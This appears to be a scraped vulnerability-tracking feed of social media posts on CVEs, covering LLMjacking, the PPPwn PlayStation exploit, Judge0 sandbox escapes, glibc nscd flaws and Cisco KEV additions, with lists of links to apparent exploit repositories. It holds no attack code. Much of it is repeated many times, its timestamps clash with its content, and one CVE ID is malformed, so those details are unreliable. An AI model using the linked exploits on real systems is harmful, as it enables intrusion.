Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.
Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.
updated 2023-02-01T05:01:22
4 posts
PPPwn - PlayStation 4 PPPoE RCE
"PPPwn is a kernel remote code execution #exploit for #PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation."
##Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
PPPwn - PlayStation 4 PPPoE RCE
"PPPwn is a kernel remote code execution #exploit for #PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation."
##Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!
"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
https://hackerone.com/reports/2177925
"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
https://wololo.net/2024/04/26/ps4-ps5-theflow-discloses-kernel-vulnerability-relying-on-old-bug-from-2006-impacts-ps4-up-to-11-00-ps5-up-to-8-20-more-details-in-may/
updated 2023-01-29T05:01:16
2 posts
@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-01-27T05:06:26
2 posts
4 repos
https://github.com/z92g/CVE-2022-26138
https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-
@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2022-02-01T17:45:43.750000
4 posts
10 repos
https://github.com/murataydemir/CVE-2021-21975
https://github.com/rabidwh0re/REALITY_SMASHER
https://github.com/CyberCommands/CVE2021-21975
https://github.com/zhzyker/vulmap
https://github.com/dorkerdevil/CVE-2021-21975
https://github.com/Vulnmachines/VMWare-CVE-2021-21975
https://github.com/Al1ex/CVE-2021-21975
https://github.com/TheTh1nk3r/exp_hub
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2021-06-03T11:15:08.307000
4 posts
12 repos
https://github.com/W01fh4cker/Serein
https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak
https://github.com/hackingyseguridad/directoriotraversal
https://github.com/milo2012/CVE-2018-13379
https://github.com/yukar1z0e/CVE-2018-13379
https://github.com/Blazz3/cve2018-13379-nmap-script
https://github.com/B1anda0/CVE-2018-13379
https://github.com/pwn3z/CVE-2018-13379-FortinetVPN
https://github.com/nivdolgin/CVE-2018-13379
https://github.com/jpiechowka/at-doom-fortigate
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Critical Vulnerabilities in Judge0 Lead to Sandbox Escape, Host Takeover https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/ #Malware&Threats #Vulnerabilities #CVE202428189 #CVE202429021 #Judge0
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.
The vulnerability details:
- CVE-2024-33599: https://sourceware.org/bugzilla/show_bug.cgi?id=31677
- CVE-2024-33600: https://sourceware.org/bugzilla/show_bug.cgi?id=31678
- CVE-2024-33601: https://sourceware.org/bugzilla/show_bug.cgi?id=31679
- CVE-2024-33602: https://sourceware.org/bugzilla/show_bug.cgi?id=31680
https://lists.debian.org/debian-security-announce/2024/msg00087.html #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)
Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. https://www.securityweek.com/critical-vulnerabilities-in-judge0-lead-to-sandbox-escape-host-takeover/
##2 posts
2 repos
https://github.com/jhonnybonny/CVE-2023-3824
https://github.com/StayBeautiful-collab/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
